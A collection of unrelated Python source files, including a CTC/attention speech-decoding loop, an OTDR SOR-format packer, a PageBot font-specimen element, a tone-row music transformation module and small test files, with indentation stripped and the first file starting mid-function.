v['rnnlm_scores'] = new_rnnlm_scores[tmp_count, :].cpu()
tmp_count += 1
v.pop('rnnlm_token', None)
hyps_ctc[k] = v
logging.debug("\nFrame %d, CTCPrefix finished ..." % t)
for l in list(hyps_ctc.keys())[:min(10, len(hyps_ctc))]:
logging.debug("hyp: [%s], total score: %f" % ("".join([char_list[x] for x in l]),
logsumexp(*hyps_ctc[l]['ctc_scores']) + recog_args.lm_weight * hyps_ctc[l]['accum_lmscore'] + penalty * (len(l)-1)))
# Weiran: this is the DCOND step in the paper.
ys = []
tokens_to_update = []
caches = []
for l in hyps_ctc:
if len(l)>1:
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
if t - ctc_time > 2 and lpz[t, c] > math.log(0.01) > max(lpz[ctc_time+1, c], lpz[ctc_time+2, c]):
# Weiran: I am also updating the ctc_times.
logging.debug("for hyp [%s], changing ctc_time from %d to %d" %
("".join([char_list[x] for x in l]), ctc_time, t))
hyps_ctc[l]['ctc_times'][-1] = t
if l in hyps_att: # and hyps_att[l]['att_times'][-1] < t-2:
ys.append(l[:-1])
tokens_to_update.append(c)
caches.append([ca[:-1,:] for ca in hyps_att[l]['cache']])
num_to_update = len(ys)
if num_to_update > 0:
logging.debug("Adjusting %d att hyps ..." % num_to_update)
# Memory up to frame t.
hs_pad = enc_output[:, :min(t+1+dec_delay, T), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
l = ys[i] + (tokens_to_update[i],)
logging.debug("Attention: Appending %s to [%s]" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in ys[i]])))
logging.debug("att_score_last changes from %f to %f" %
(hyps_att[l]['att_score_last'], local_att_scores[i, tokens_to_update[i]]))
hyps_att[l]['att_score'] = hyps_att[l]['att_score'] - hyps_att[l]['att_score_last'] + local_att_scores[i, tokens_to_update[i]]
hyps_att[l]['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
hyps_att[l]['cache'] = new_caches[i]
hyps_att[l]['att_times'][-1] = min(t+dec_delay, T-1)
# If some ctc new hyps can be premature, the actual time delay can be too short??
logging.debug("Computing attention scores finished ...")
del new_caches
logging.debug("\n")
# Compute attention scores, which lags behind CTC by at most 1 token.
logging.debug("\n")
logging.debug("<" * 40)
logging.debug("Attention pass I: checking hypothesis ...")
ys = []
tokens_to_update = []
caches = []
for l in hyps_ctc:
if l not in hyps_att:
# logging.debug("Attention: Considering augmenting the hyp: [%s]" % " ".join([char_list[_] for _ in l]))
oldl = l[:-1]
if oldl in hyps_att:
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
# If it has been sufficient number of frames since CTC added the token c.
if t + dec_delay - ctc_time >= att_delay:
assert t + dec_delay - ctc_time == att_delay, "weird timing !"
logging.debug("Attention: Will append %s to [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldl])))
logging.debug("Attention: Perfect delay %d (current t=%d, ctc_time=%d)" % (att_delay, t, ctc_time))
ys.append(oldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldl]['cache'])
else:
# logging.debug("Attention: But not augmenting due to insufficient context!")
pass
else:
oldoldl = l[:-2]
c = l[-2]
assert oldoldl in hyps_att, "att hyp lagging by more than TWO steps!!!"
att_time = hyps_att[oldoldl]['att_times'][-1]
logging.debug("\nAttention: Hyp lagging by two steps!")
logging.debug("Attention: Will add %s to [%s], in order to catch [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldoldl]), " ".join([char_list[_] for _ in l]) ))
logging.debug("Attention: current t=%d, att_time=%d, ctc_time=%d, while att_delay=%d" %
(t, att_time, hyps_ctc[l]['ctc_times'][-1], att_delay))
ys.append(oldoldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldoldl]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
logging.debug("\n")
logging.debug("#" * 40)
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
# Memory up to frame t.
hs_pad = enc_output[:, :min(t+1+dec_delay, T), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
newl = ys[i] + (tokens_to_update[i],)
newdict = dict()
logging.debug("Attention: Appending %s to [%s], add to att score %s" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
newdict['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
newdict['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
newdict['att_times'] = hyps_att[oldl]['att_times'] + [min(t+dec_delay, T-1)]
newdict['cache'] = new_caches[i]
hyps_att[newl] = newdict
# If some ctc new hyps can be premature, the actual time delay can be too short??
logging.debug("Computing attention scores finished ...")
del new_caches
logging.debug("\n")
# Obtain joint score.
if not t==T-1:
logging.debug(">" * 40)
joint_hyps = []
for l in hyps_ctc:
total_score = recog_args.lm_weight * hyps_ctc[l]['accum_lmscore'] + penalty * (len(l) - 1)
ctc_score = logsumexp(*hyps_ctc[l]['ctc_scores'])
# Weiran: my implementation of combined score.
if l in hyps_att:
att_score = hyps_att[l]['att_score']
total_score += ctc_weight * ctc_score + (1 - ctc_weight) * att_score
else:
att_score = hyps_att[l[:-1]]['att_score']
total_score += ctc_weight * hyps_ctc[l]['prev_score'] + (1 - ctc_weight) * att_score + (ctc_score - hyps_ctc[l]['prev_score'])
"""
# The choice in MERL paper.
if l in hyps_att:
att_score = hyps_att[l]['att_score']
else:
att_score = hyps_att[l[:-1]]['att_score']
total_score += ctc_weight * ctc_score + (1 - ctc_weight) * att_score
"""
joint_hyps.append((l, total_score))
joint_hyps = dict(sorted(joint_hyps, key=lambda x: x[1], reverse=True)[:beam_size])
logging.debug("JOINT hyps ...")
for l in list(joint_hyps.keys())[:min(10, len(joint_hyps))]:
logging.debug("hyp: [%s], total score: %f" % ("".join([char_list[x] for x in l]), joint_hyps[l]))
# Prune again the CTC hyps.
final_ctc_keys = ctc_top_keys.union(set(joint_hyps.keys()))
del joint_hyps
# Clean dictionaries.
for l in list(hyps_ctc.keys()):
if l not in final_ctc_keys:
# logging.debug("Removing hypo [%s] from hyps_ctc" % " ".join([char_list[_] for _ in l]))
hyps_ctc.pop(l)
final_att_keys = set([l[:-1] for l in final_ctc_keys]).union(final_ctc_keys)
for l in list(hyps_att.keys()):
if l not in final_att_keys:
# logging.debug("Removing hypo [%s] from hyps_ctc" % " ".join([char_list[_] for _ in l]))
hyps_att.pop(l)
# Finished loop over time.
# FINAL STAGES.
logging.debug("*" * 80)
logging.debug("CTC finished all %d frames ..." % T)
logging.debug("\n")
logging.debug("Attention: Clear one-step delays ...")
ys = []
tokens_to_update = []
caches = []
t = T - 1
for l in hyps_ctc:
if l not in hyps_att:
oldl = l[:-1]
assert oldl in hyps_att, "att can not be lagging by more than ONE step!!!"
c = l[-1]
ctc_time = hyps_ctc[l]['ctc_times'][-1]
# Even if there is not sufficient number of frames since CTC added the token c.
logging.debug("Attention: Will append %s to [%s]" %
(char_list[c], " ".join([char_list[_] for _ in oldl])))
logging.debug("Attention: Actual delay %d (current t=%d, ctc_time=%d)" % (t-ctc_time, t, ctc_time))
ys.append(oldl)
tokens_to_update.append(c)
caches.append(hyps_att[oldl]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
hs_pad = enc_output[:, :(t + 1), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
newl = ys[i] + (tokens_to_update[i],)
newdict = dict()
logging.debug("Attention: Appending %s to [%s], add to att score %f" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
newdict['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
newdict['att_score_last'] = local_att_scores[i, tokens_to_update[i]]
newdict['att_times'] = hyps_att[oldl]['att_times'] + [t]
newdict['cache'] = new_caches[i]
hyps_att[newl] = newdict
# If some ctc new hyps can be premature, the actual time delay can be too short.
del new_caches
logging.debug("Computing attention scores finished ...")
# Final final step.
logging.debug("\nCTC rnnlm_scores update with <eos> ...")
for l in hyps_ctc:
hyps_ctc[l]['accum_lmscore'] = hyps_ctc[l]['accum_lmscore'] + hyps_ctc[l]['rnnlm_scores'][eos_idx]
logging.debug("\nAttention adding <eos> to hyps ...")
ys = []
tokens_to_update = []
caches = []
for l in hyps_att:
ys.append(l)
tokens_to_update.append(eos_idx)
caches.append(hyps_att[l]['cache'])
# Weiran: one thing we could do to reduce computation is to collect those unique ys.
num_to_update = len(ys)
logging.debug("Forwarding %d attention hyps ..." % num_to_update)
if num_to_update > 0:
hs_pad = enc_output[:, :(t + 1), :].repeat([num_to_update, 1, 1])
local_att_scores, new_caches = model.decoder.batch_forward_one_step_with_cache(ys, caches, hs_pad, None)
local_att_scores = local_att_scores.numpy()
for i in range(num_to_update):
oldl = ys[i]
logging.debug("Attention: Appending %s to [%s], add to att score %f" %
(char_list[tokens_to_update[i]], " ".join([char_list[_] for _ in oldl]),
local_att_scores[i, tokens_to_update[i]]))
hyps_att[oldl]['att_score'] = hyps_att[oldl]['att_score'] + local_att_scores[i, tokens_to_update[i]]
del new_caches
logging.debug("Computing attention final scores finished ...")
logging.debug("\n")
joint_hyps = []
for l in hyps_ctc:
ctc_score = logsumexp(*hyps_ctc[l]['ctc_scores'])
att_score = hyps_att[l]['att_score']
total_score = ctc_weight * ctc_score + (1 - ctc_weight) * att_score + recog_args.lm_weight * hyps_ctc[l][
'accum_lmscore'] + penalty * len(l)
joint_hyps.append((l + (eos_idx,), total_score))
joint_hyps = sorted(joint_hyps, key=lambda x: x[1], reverse=True)[:min(len(joint_hyps), recog_args.nbest)]
# Get consistent output format.
return [{'yseq': list(l), 'score': v, 'ctc_times': hyps_ctc[l[:-1]]['ctc_times'], 'att_times': hyps_att[l[:-1]]['att_times'] + [T-1]} for l, v in joint_hyps]
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
import sys
import pytz
from datetime import datetime
import logging
from json2sor import tools
import re
import struct
import math
logger = logging.getLogger('pyOTDR')
unit_map = {
"mt (meters)":"mt",
"km (kilometers)":"km",
"mi (miles)" : "mi",
"kf (kilo-ft)":"kf"
}
tracetype = {
"ST[standard trace]" : 'ST',
"RT[reverse trace]" : 'RT',
"DT[difference trace]" : 'DT',
"RF[reference]" : 'RF',
}
def process(results, format):
"""
results: dict with the parsed results for this block;
format: requested output format (currently unused in this function);
we assume mapblock.process() has already been run
"""
bname = "FxdParams"
fh = tools.getStr(bname)
params = results[bname]
fh += _process_fields(params)
return fh
# ================================================================
def _process_fields(results):
# functions to use
# 'h': get_hexstring
# 'v': get_uint
# 's': get_string
# 'i': get_signed
"""
0-3: date/time: 4 bytes
4-5: units: 2 characters
6-7: wavelength: 2 bytes
8-11: acquisition offset: 4 bytes integer
12-15: acquisition offset distance: 4 bytes integer
16-17: number of pulse width entries: 2 bytes (the next three parameters are repeated according to the number of entries)
18-19: pulse-width: 2 bytes (repeated)
20-23: sample spacing: 4 bytes (repeated)
24-27: number of data points in trace: 4 bytes (repeated)
28-31: index of refraction: 4 bytes
32-33: backscattering coefficient: 2 bytes
34-37: number of averages (?): 4 bytes
38-39: averaging time: 2 bytes
40-43: range (?): 4 bytes
44-47: acquisition range distance: 4 bytes signed int
48-51: front panel offset: 4 bytes signed int
52-53: noise floor level: 2 bytes
54-55: noise floor scaling factor: 2 bytes signed int
56-57: power offset first point: 2 bytes
58-59: loss threshold: 2 bytes
60-61: reflection threshold: 2 bytes
62-63: end-of-transmission threshold: 2 bytes
64-65: trace type: 2 characters
66-69: X1: 4 bytes signed int
70-73: Y1: 4 bytes signed int
74-77: X2: 4 bytes signed int
78-81: Y2: 4 bytes signed int
"""
unix = re.search(r'\d+',results['date/time'].split('(')[1]).group()
xstr = struct.pack('<I', int(unix))
xstr += bytearray(results['unit'][0:2], 'ascii')
wave = float(results['wavelength'].replace(' nm', ''))/0.1
xstr += tools.get_uint(int(wave))
xstr += tools.get_signed(results['acquisition offset'],4)
xstr += tools.get_signed(results['acquisition offset distance'], 4)
xstr += tools.get_uint(results['number of pulse width entries'])
xstr += tools.get_uint(results['pulse width'])
ss = re.search(r'\d+', results['sample spacing']).group()
xstr += tools.get_uint(int(float(ss) / 1e-8),4)
xstr += tools.get_uint(int(results['num data points']), 4)
# print("Number data points => {}".format(results['num data points']))
index = float(results['index']) * 100000
xstr += tools.get_uint(int(index), 4)
bc=float(results['BC'].replace(' dB', '')) / -0.1
xstr += tools.get_uint(int(bc))
xstr += tools.get_uint(results['num averages'], 4)
avt=results['averaging time'].replace(' sec', '')
xstr += tools.get_uint(int(avt))
rng =int(results['range'] / 2e-5)
xstr += tools.get_uint(int(rng), 4)
# print("Range => {}".format(rng))
# print("Range distance => {}".format(results['acquisition range distance']))
xstr += tools.get_signed(results['acquisition range distance'], 4)
xstr += tools.get_signed(results['front panel offset'], 4)
xstr += tools.get_uint(results['noise floor level'], 2)
xstr += tools.get_signed(results['noise floor scaling factor'], 2)
xstr += tools.get_uint(results['power offset first point'])
'''threshold'''
lth = float(results['loss thr'].replace(' dB', '')) / 0.001
ref = float(results['refl thr'].replace(' dB', '')) /-0.001
eot = float(results['EOT thr'].replace(' dB', '')) / 0.001
xstr += tools.get_uint(int(lth), 2)
xstr += tools.get_uint(math.ceil(ref), 2)
xstr += tools.get_uint(math.ceil(eot), 2)
xstr += bytearray(results['trace type'][0:2],'ascii')
xstr += tools.get_signed(results['X1'],4)
xstr += tools.get_signed(results['Y1'],4)
xstr += tools.get_signed(results['X2'],4)
xstr += tools.get_signed(results['Y2'],4)
return xstr
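# A minimal sketch of the fixed-point scaling used above (example values are
# hypothetical): each physical quantity is rescaled to an integer at the
# resolution the SOR FxdParams block expects before being packed.
#   wavelength "1550.0 nm"  -> 1550.0 / 0.1  = 15500   (uint)
#   index      "1.500000"   -> 1.5 * 100000  = 150000  (4-byte uint)
#   BC         "-80.00 dB"  -> -80.0 / -0.1  = 800     (uint)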
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
#
# P A G E B O T
#
# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens
# www.pagebot.io
# Licensed under MIT conditions
#
# Supporting DrawBot, www.drawbot.com
# Supporting Flat, xxyxyz.org/flat
# -----------------------------------------------------------------------------
#
# stacked.py
#
from random import choice
from pagebot.elements.variablefonts.basefontshow import BaseFontShow
from pagebot.constants import JUSTIFIED, LEFT, ORIGIN
from pagebot.contributions.filibuster.blurb import Blurb
from pagebot.toolbox.units import pointOffset
class Stacked(BaseFontShow):
"""Showing the specified (variable) font as full page with a matrix
of all glyphs in the font.
Usage of standard style parameters
fill Fill color for the background of the element
stroke Draw frame around the element
textFill Color of the text. Default is black.
padding Use in case of background color or frame. Default is 0
"""
def __init__(self, f, words=None, labelFontSize=None, **kwargs):
"""
>>> from pagebot.fonttoolbox.objects.font import findFont
>>> from pagebot.document import Document
>>> from pagebot.constants import Letter
>>> from pagebot import getContext
>>> from pagebot.conditions import *
>>> from pagebot.toolbox.units import em
>>> c = getContext()
>>> w, h = Letter
>>> doc = Document(w=w, h=h, padding=80, autoPages=2, context=c)
>>> conditions = [Fit()]
>>> page = doc[1]
>>> font1 = findFont('AmstelvarAlpha-VF')
>>> style = dict(gh=16, fill=0.95, leading=em(1.4))
>>> gs = Stacked(font1, parent=page, conditions=conditions, padding=40, style=style, context=c)
>>> page = doc[2]
>>> font2 = findFont('RobotoDelta-VF')
>>> #font2 = findFont('Upgrade-Regular')
>>> #font2 = findFont('Escrow-Bold')
>>> style = dict(stroke=0, strokeWidth=0.25, gh=8, leading=em(1.4))
>>> gs = Stacked(font2, parent=page, conditions=conditions, style=style, padding=40, context=c)
>>> score = doc.solve()
>>> # FIXME
>>> #doc.export('_export/%sStacked.pdf' % font1.info.familyName)
"""
BaseFontShow.__init__(self, **kwargs)
self.f = f # Font instance
self.words = words or {} # Optional dictionary for headline words. Keys are frame index numbers.
self.usedText = set() # Avoid double use of headline words.
# Add semi-randomly generated content, styles for fitting.
self.blurb = Blurb() # Random content creator, in case there is no content supplied.
self.lineTag = 'design_headline' # Default label where to find random word choices.
self.headlineTag = 'design_headline' # Default label where to find (or create) random headline text.
self.textTag = 'da_text' # Default label where to find (or create) random body text.
def build(self, view, origin=ORIGIN, **kwargs):
"""Default drawing method just drawing the frame.
Probably will be redefined by inheriting element classes."""
c = self.context
p = pointOffset(self.origin, origin)
p = self._applyScale(view, p)
p = self._applyAlignment(p) # Ignore z-axis for now.
self.buildFrame(view, p) # Draw optional background fill, frame or borders.
# Let the view draw frame info for debugging, in case view.showFrame == True
view.drawElementFrame(self, p)
# Draw the actual content of the element as stacked specimen rectangles.
self.drawStacked(view, p, **kwargs)
self._restoreScale(view)
view.drawElementInfo(self, origin) # Depends on flag 'view.showElementInfo'
def getText(self, tag, cnt=None, charCnt=None):
"""If the tag type of text is in self.words, then take a random choice from there.
Otherwise use the tag to create a blurb with the specified length."""
if tag in self.words:
text = choice(self.words[tag])
if text in self.usedText: # Already used, try once more.
text = choice(self.words[tag])
else:
text = self.blurb.getBlurb(tag, cnt=cnt, charCnt=charCnt)
self.usedText.add(text)
return text
def drawStacked(self, view, origin, **kwargs):
"""Draw the content of the element, responding to size, styles, font and content."""
c = self.context
# Start on top left, with respect to optional padding value.
x = self.pl
y = self.h-self.pt
# Top headline. (x,y) is top-left of the box, passed on for the position of the next box.
s = self.getText(self.lineTag, charCnt=10).upper()
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=0.7, wdth=-0.4)
# Second headline
s = self.getText(self.lineTag, 4, 18)
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=-0.7)
# Some large headline thing
s = self.getText(self.lineTag, 5, 24)
x, y = self.buildStackedLine(s, origin, x, y, self.pw, wght=0.3, wdth=-0.4)
# Body text 16/24
s = self.getText(self.textTag, 20)
x, y = self.buildText(None, s, origin, x, y, self.pw, None, 16, JUSTIFIED)
# Body text 12/18
s = self.getText(self.textTag, 30)
x, y = self.buildText(None, s, origin, x, y, self.pw, None, 12, JUSTIFIED)
# Body text 10/15
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag, cnt=20)
x, y = self.buildText(s1, s2, origin, x, y, self.pw, None, 10, JUSTIFIED, Bwght=0.7, Bwdth=-0.1)
# Body text 9/13.5
        # Don't update to the new y, next column needs to be on the right, starting at the same y.
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag) + ' ' + self.getText(self.textTag)
x, _ = self.buildText(s1, s2, origin, x, y, (self.pw-self.gw)/2, y-self.pb,
9, LEFT, labelSize=7, Bwght=0.6, Bwdth=-0.1)
# Body text 8/12
s1 = self.getText(self.headlineTag)
s2 = self.getText(self.textTag) + ' ' + self.getText(self.textTag)
x, y = self.buildText(s1, s2, origin, x+(self.pw+self.gw)/2, y, (self.pw-self.gw)/2, y-self.pb,
8, LEFT, labelSize=7, Bwght=0.6, Bwdth=-0.1)
if __name__ == '__main__':
import doctest
import sys
sys.exit(doctest.testmod()[0])
|
"""Helper functions."""
import random
def make_id(stringLength=10):
"""Create an id with given length."""
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
return "".join(random.choice(letters) for i in range(stringLength))
|
"""
Transform a fragment in progress.
Note that intermediate functions from this module modify only `temporal_content` and
`sonic_content` attributes, but `melodic_lines` and `sonorities` attributes are left unchanged.
This is done for the sake of performance. It is cheaper to update all dependent attributes
just once after all transformations are applied. So use the `transform` function to get a
consistent fragment.
Author: Nikolay Lysenko
"""
import itertools
import random
from typing import Any, Callable
from .fragment import Fragment, SUPPORTED_DURATIONS, override_calculated_attributes
from .music_theory import (
TONE_ROW_LEN, invert_tone_row, revert_tone_row, rotate_tone_row, transpose_tone_row
)
TRANSFORMATIONS_REGISTRY_TYPE = dict[str, tuple[Callable, list[Any]]]
def get_duration_changes() -> dict[tuple[float, float], list[tuple[float, float]]]:
"""
Get mapping from durations of two events to list of pairs of durations of the same total sum.
:return:
mapping from durations of two events to list of pairs of durations of the same total sum
"""
result = {}
cartesian_product = itertools.product(SUPPORTED_DURATIONS, SUPPORTED_DURATIONS)
for first_duration, second_duration in cartesian_product:
if first_duration > second_duration:
continue
total_sum = first_duration + second_duration
durations = []
for duration in SUPPORTED_DURATIONS:
complementary_duration = total_sum - duration
if complementary_duration in SUPPORTED_DURATIONS:
durations.append((duration, complementary_duration))
result[(first_duration, second_duration)] = durations
return result
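# Illustration (hypothetical durations; the real SUPPORTED_DURATIONS constant comes
# from .fragment): if 1.0, 2.0 and 3.0 are all supported, the key (1.0, 2.0) has
# total sum 3.0 and maps to [(1.0, 2.0), (2.0, 1.0)], i.e. every ordered pair of
# supported durations that preserves the sum.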
def draw_random_indices(
mutable_sonic_content_indices: list[int], n_tone_row_instances_by_group: list[int]
) -> tuple[int, int]:
"""
Draw index of melodic lines group and index of tone row instance from it.
:param mutable_sonic_content_indices:
indices of groups such that their sonic content can be transformed
:param n_tone_row_instances_by_group:
list where number of tone row instances in the group is stored for each group of
melodic lines sharing the same series (in terms of vertical distribution of series pitches)
:return:
index of group and index of tone row instance from it
"""
group_index = random.choice(mutable_sonic_content_indices)
n_instances = n_tone_row_instances_by_group[group_index]
instance_index = random.randrange(0, n_instances)
return group_index, instance_index
def find_instance_by_indices(
fragment: Fragment, group_index: int, instance_index: int
) -> list[str]:
"""
Find sequence of 12 pitch classes by its indices.
:param fragment:
a fragment
:param group_index:
index of group of melodic lines sharing the same series (in terms of vertical distribution
of series pitches)
:param instance_index:
index of tone row instance within sonic content of the group
:return:
sequence of 12 pitch classes
"""
line = fragment.sonic_content[group_index]
start_event_index = instance_index * TONE_ROW_LEN
end_event_index = (instance_index + 1) * TONE_ROW_LEN
pitch_classes = []
index = 0
for pitch_class in line:
if pitch_class == 'pause':
continue
if index >= end_event_index:
break
if index >= start_event_index:
pitch_classes.append(pitch_class)
index += 1
return pitch_classes
def replace_instance(
fragment: Fragment, group_index: int, instance_index: int, new_instance: list[str]
) -> Fragment:
"""
Replace a particular sequence of 12 tones with another sequence of 12 tones.
:param fragment:
a fragment
:param group_index:
index of group of melodic lines sharing the same series (in terms of vertical distribution
of series pitches)
:param instance_index:
index of tone row instance within sonic content of the group
:param new_instance:
new sequence of 12 pitch classes
:return:
modified fragment
"""
line = fragment.sonic_content[group_index]
start_event_index = instance_index * TONE_ROW_LEN
end_event_index = (instance_index + 1) * TONE_ROW_LEN
index_without_pauses = 0
for index, pitch_class in enumerate(line):
if pitch_class == 'pause':
continue
if index_without_pauses >= end_event_index:
break
if index_without_pauses >= start_event_index:
line[index] = new_instance.pop(0)
index_without_pauses += 1
return fragment
def apply_duration_change(
fragment: Fragment,
duration_changes: dict[tuple[float, float], list[tuple[float, float]]]
) -> Fragment:
"""
Change durations of two random events from the same melodic line.
:param fragment:
a fragment to be modified
:param duration_changes:
mapping from durations of two events to list of pairs of durations of the same total sum
:return:
modified fragment
"""
line_index = random.choice(fragment.mutable_temporal_content_indices)
line_durations = fragment.temporal_content[line_index]
events_indices = random.sample(range(len(line_durations)), 2)
key = tuple(sorted(line_durations[event_index] for event_index in events_indices))
all_durations = duration_changes[key]
durations = random.choice(all_durations)
for event_index, duration in zip(events_indices, durations):
line_durations[event_index] = duration
return fragment
def apply_pause_shift(fragment: Fragment) -> Fragment:
"""
Shift a random pause one position to the left or to the right.
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
line = random.choice(fragment.sonic_content)
indices = []
for index, (previous_pitch_class, pitch_class) in enumerate(zip(line, line[1:])):
if pitch_class == 'pause' and previous_pitch_class != 'pause':
indices.append(index)
if pitch_class != 'pause' and previous_pitch_class == 'pause':
indices.append(index)
if not indices:
return fragment
index = random.choice(indices)
line[index], line[index + 1] = line[index + 1], line[index]
return fragment
def apply_inversion(fragment: Fragment) -> Fragment:
"""
Invert one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
tone_row_instance = invert_tone_row(tone_row_instance)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_reversion(fragment: Fragment) -> Fragment:
"""
Revert one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
tone_row_instance = revert_tone_row(tone_row_instance)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_rotation(fragment: Fragment, max_rotation: int) -> Fragment:
"""
Rotate one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:param max_rotation:
maximum size of rotation (in elements)
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
shift = random.randint(-max_rotation, max_rotation)
tone_row_instance = rotate_tone_row(tone_row_instance, shift)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def apply_transposition(fragment: Fragment, max_transposition: int) -> Fragment:
"""
Transpose one random series (transformed tone row instance).
:param fragment:
a fragment to be modified
:param max_transposition:
maximum interval of transposition (in semitones)
:return:
modified fragment
"""
group_index, instance_index = draw_random_indices(
fragment.mutable_sonic_content_indices, fragment.n_tone_row_instances_by_group
)
tone_row_instance = find_instance_by_indices(fragment, group_index, instance_index)
shift = random.randint(-max_transposition, max_transposition)
tone_row_instance = transpose_tone_row(tone_row_instance, shift)
fragment = replace_instance(fragment, group_index, instance_index, tone_row_instance)
return fragment
def create_transformations_registry(
max_rotation: int, max_transposition: int
) -> TRANSFORMATIONS_REGISTRY_TYPE:
"""
Get mapping from names to corresponding transformations and their arguments.
:param max_rotation:
maximum size of rotation (in elements)
:param max_transposition:
maximum interval of transposition (in semitones)
:return:
registry of transformations
"""
registry = {
'duration_change': (apply_duration_change, [get_duration_changes()]),
'pause_shift': (apply_pause_shift, []),
'inversion': (apply_inversion, []),
'reversion': (apply_reversion, []),
'rotation': (apply_rotation, [max_rotation]),
'transposition': (apply_transposition, [max_transposition]),
}
return registry
def transform(
fragment: Fragment,
n_transformations: int,
transformation_registry: TRANSFORMATIONS_REGISTRY_TYPE,
transformation_names: list[str],
transformation_probabilities: list[float]
) -> Fragment:
"""
Apply multiple random transformations to a fragment.
:param fragment:
a fragment to be modified
:param n_transformations:
number of transformations to be applied
:param transformation_registry:
mapping from names to corresponding transformations and their arguments
:param transformation_names:
names of transformations to choose from
:param transformation_probabilities:
probabilities of corresponding transformations; this argument must have the same length
as `transformation_names`
:return:
modified fragment
"""
names_of_transformations_to_be_applied = random.choices(
transformation_names,
transformation_probabilities,
k=n_transformations
)
for transformation_name in names_of_transformations_to_be_applied:
transformation_fn, args = transformation_registry[transformation_name]
fragment = transformation_fn(fragment, *args)
fragment = override_calculated_attributes(fragment)
return fragment
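if __name__ == '__main__':
    # Usage sketch (not part of the module): build the registry and look at the
    # available transformations. Constructing a `Fragment` is out of scope here,
    # so applying `transform` to one is only sketched in the comment below.
    registry = create_transformations_registry(max_rotation=2, max_transposition=3)
    print(sorted(registry.keys()))
    # fragment = ...  # a Fragment built elsewhere
    # fragment = transform(
    #     fragment,
    #     n_transformations=2,
    #     transformation_registry=registry,
    #     transformation_names=['pause_shift', 'inversion', 'transposition'],
    #     transformation_probabilities=[0.5, 0.25, 0.25],
    # )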
|
import pytest
import connexion
from app import usersData
@pytest.fixture(scope='module')
def client():
flask_app = connexion.FlaskApp(__name__)
with flask_app.app.test_client() as c:
yield c
def test_get_health(client):
# GIVEN no query parameters or payload
    # WHEN I access the url GET /health
# THEN the HTTP response is 404 not found
response = client.get('/health')
assert response.status_code == 404
def test_fetch_users(client):
    # GIVEN no query parameters or payload
    # WHEN I access the url GET /api/v1/users
    # THEN the HTTP response is 404, since no API specification is registered on this bare app
response = client.get('/api/v1/users')
assert response.status_code == 404
|
from contextlib import contextmanager
from datetime import datetime
from datetime import timezone
from textwrap import dedent
import mock
import pytest
from Crypto.PublicKey import RSA
from freezegun import freeze_time
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from ocflib.account.creation import _get_first_available_uid
from ocflib.account.creation import _KNOWN_UID
from ocflib.account.creation import create_account
from ocflib.account.creation import create_home_dir
from ocflib.account.creation import decrypt_password
from ocflib.account.creation import eligible_for_account
from ocflib.account.creation import encrypt_password
from ocflib.account.creation import ensure_web_dir
from ocflib.account.creation import NewAccountRequest
from ocflib.account.creation import send_created_mail
from ocflib.account.creation import send_rejected_mail
from ocflib.account.creation import validate_callink_oid
from ocflib.account.creation import validate_calnet_uid
from ocflib.account.creation import validate_email
from ocflib.account.creation import validate_password
from ocflib.account.creation import validate_request
from ocflib.account.creation import validate_username
from ocflib.account.creation import ValidationError
from ocflib.account.creation import ValidationWarning
from ocflib.account.submission import AccountCreationCredentials
from ocflib.account.submission import Base
